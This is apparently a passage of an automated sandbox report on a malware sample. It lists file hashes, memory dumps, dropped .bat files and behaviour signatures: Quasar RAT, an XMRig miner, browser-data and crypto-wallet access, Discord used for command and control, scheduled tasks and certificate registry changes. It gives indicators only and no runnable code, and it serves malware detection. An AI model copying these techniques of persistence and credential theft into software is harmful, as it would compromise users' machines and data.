| SHA256 | ad84d39c1ae41e1d8dc63d6d7ecc6cecbeb84c55e12c3cd88db7716e3e4d0b8f |
| SHA512 | c118546106eb4352afa98dc4e969105dbb84465039e2b110a936657d9c81e4e8d6f7ba20c541d1566361bcaf7e7bf2936b19e4e845f8ee41f68b50d54ae13947 |
memory/2948-156-0x0000000000E80000-0x00000000011A4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pYMwTFGAHQ2t.bat
| MD5 | 5110cd4a9923116595a890e9b9ce8b7d |
| SHA1 | 2ac6090255797f9d36e1dc88f03dfc02c64a1e7b |
| SHA256 | 4260bf2d69f8c59efffdb6f8b4bb384116d3500d948faa0275a44ff706a98a48 |
| SHA512 | 5666ea9b92c2d287a0d99a8024ca5eed799d43fdead70bc4fe91551dc9f3a10d8771bb856e64c40525f782c08a6f76a443b99893463e69a6ed2e5e386d50c0fa |
memory/2636-167-0x0000000140000000-0x00000001407EF000-memory.dmp
memory/2580-169-0x0000000140000000-0x000000014002A000-memory.dmp
memory/1812-171-0x0000000001070000-0x0000000001394000-memory.dmp
memory/2636-170-0x0000000140000000-0x00000001407EF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\PWtLsFpYfhkR.bat
| MD5 | cc1c2f182c81139dfcb2d439c3520b40 |
| SHA1 | 3bf65c8c2dc1798f56675eb3751d656a57a86a1e |
| SHA256 | 9d155ef346b3ae2d3cd4202b021c4f311d491ef4fef911c19e7c2e0c694efbba |
| SHA512 | 5b66f0bde345839b065bd89095906a64093c75d752e7ed282b284d50e170782e5eec1962034fd29da09ca476ae8a708a4e22ec46e1c02fb103bad469fdcf3b33 |
memory/2636-183-0x0000000140000000-0x00000001407EF000-memory.dmp
memory/2036-185-0x00000000FFD60000-0x00000000FFDA8000-memory.dmp
memory/2036-186-0x00000000FFD60000-0x00000000FFDA8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\8NAkI7HXDSwK.bat
| MD5 | 11b303664fb5a5cf20d2edbf0ff825a6 |
| SHA1 | e159cd29a57d274c1ce4c0ba0d3d0d66c91df3d4 |
| SHA256 | a73e10d8c039612280dd27da6bb797955e5f4cd25f9d6a99a76c7ea03c9e69e3 |
| SHA512 | 3567cb879b5a3f157c5487f57c0e29c9a05566c0368b31bbc998d91b2cc470d4b7be5af0a947dce4372d07ec78bfb1bd45d7287e7d0a8126395031990faf2b99 |
memory/2636-197-0x0000000140000000-0x00000001407EF000-memory.dmp
memory/956-199-0x0000000001340000-0x0000000001664000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UF3GWPm9T8OF.bat
| MD5 | cba8eb3502b55a76ab5b8b7afea08fc4 |
| SHA1 | cd512344a4e171160e4609b0ea1a7d2d8f0ee78a |
| SHA256 | 0656071a39b9b7aeb37986d5f4fb7332d34a01181d06ea6b535ef993daface58 |
| SHA512 | fc7b7bb9b14eac0f3f66b5b31d164741bb3ccdc47cb84949ffd35198e8fa7e8358519600a18cdd36d87e40763d92bbae151d75010ebfe6db24107681856c892a |
memory/2636-211-0x0000000140000000-0x00000001407EF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\t8QscWpZLsLL.bat
| MD5 | 9a024a13702fb41e2082668d138a5435 |
| SHA1 | 24d039bab249046a74e0685663f8089ee192cb3c |
| SHA256 | 82bece5a7447b4d56335eb371285ff998972877d25d7abebc3ca4494c5d260ab |
| SHA512 | 7d16f8f21ead4c774640086839a90369a5e98766055796a05bcdc813fac845b54b64264e9154019d2e8ec109073baa115819749731741508a7e1b50f9baff7cb |
memory/2636-223-0x0000000140000000-0x00000001407EF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BvgSXlCAmp3Q.bat
| MD5 | 2b11a05be2ccf5f141828b1bf49e13fe |
| SHA1 | a7276647905936599e9d67a438279333a6c2cbd5 |
| SHA256 | 8fc35bf220603fa36e83133d35d6461e9253f51e24a2fb41ae32bd280181197d |
| SHA512 | 0013e6e1bcac916c67dc10f06966c3ae2fb32949b3bfbaab94c9bc062158412766bbb6ff7e40b3087aee9f05c5bbe9e61aa59eb617a22f12ed07a0d18169ffda |
memory/2636-235-0x0000000140000000-0x00000001407EF000-memory.dmp
memory/2124-237-0x0000000000290000-0x00000000005B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\LljIFbu92D2Q.bat
| MD5 | 0efe7ede1e530787c73e9a873ff03e71 |
| SHA1 | 512a0f30527e5d4f2637c2892c20f9756151e397 |
| SHA256 | bf3387646ade72abd5c52221185e8412dc09489bdf5ecbf317c757ca0468c6b3 |
| SHA512 | 843b6a9d97d481210a7f45caafa44097739b336fe0b34f6fcc5c79f510e9a2b8c5bb1c69b012c53dd4b7b7fb08f1ef91d00935b2ed40d4116dd11bae21b87aae |
memory/2636-249-0x0000000140000000-0x00000001407EF000-memory.dmp
memory/1528-251-0x0000000000A70000-0x0000000000D94000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mZZNrjWgmwdt.bat
| MD5 | 1f432c4dab4eeb47918341e02d58f178 |
| SHA1 | d005054765182294baae6d2c889d7202be22a4da |
| SHA256 | 18452228951b665d6f1154eb0303225cb1fa45d67cb3046f992f8db9dbff752d |
| SHA512 | 0a35bd353e64a32801e07055d655196c41713ed74ce35154462e01172b4d98642854f8612d60ec75951df95770e50dbb530f65fcb7c83e5b35c69564edc34f59 |
memory/2636-262-0x0000000140000000-0x00000001407EF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rbf5PHVW1ZFD.bat
| MD5 | 1ab032a65bc3cada21f5a22c07608f12 |
| SHA1 | 9f3aa458acba54a4424276179de314d8a2a4e567 |
| SHA256 | f263edd113ccf0284d1c0add7d538c3e7ac8de849057c5d108f94054683c7a12 |
| SHA512 | cb4e33cfd89a8e7ef24d65b707da94d2a887165a09106c9afe73d2553db3c69795c1ed1576ed06c2ac7c59958388453ffee60f6a2222ced0701125c2e52e9c03 |
memory/2636-275-0x0000000140000000-0x00000001407EF000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
| MD5 | da54c5c7c2db8a76845f3c2446296193 |
| SHA1 | 0ea48b6c4fec2162cdd9b302d6d39ef1972be694 |
| SHA256 | 445cd7d2ccd7d18a416032968c49ac58b39eafa632f54da6dca301e04d3d3f18 |
| SHA512 | 3b4847e2d62f8516e7576d8c123e254217a8ee76da49b7af2300537d3bf5ba294ddda3ae8dc452742ca866efe8d5b5530423d3d6c796ab666bec9f2aa832eaf1 |
memory/556-277-0x0000000000C40000-0x0000000000F64000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-14 04:34
Reported
2024-06-14 04:38
Platform
win10v2004-20240611-en
Max time kernel
148s
Max time network
153s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2524 created 3536 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 2524 created 3536 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 2524 created 3536 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 2012 created 3536 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 2012 created 3536 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 2012 created 3536 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 2012 created 3536 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 2012 created 3536 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2012 set thread context of 6084 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
| PID 2012 set thread context of 4548 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\cmd.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Google\Chrome\updater.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
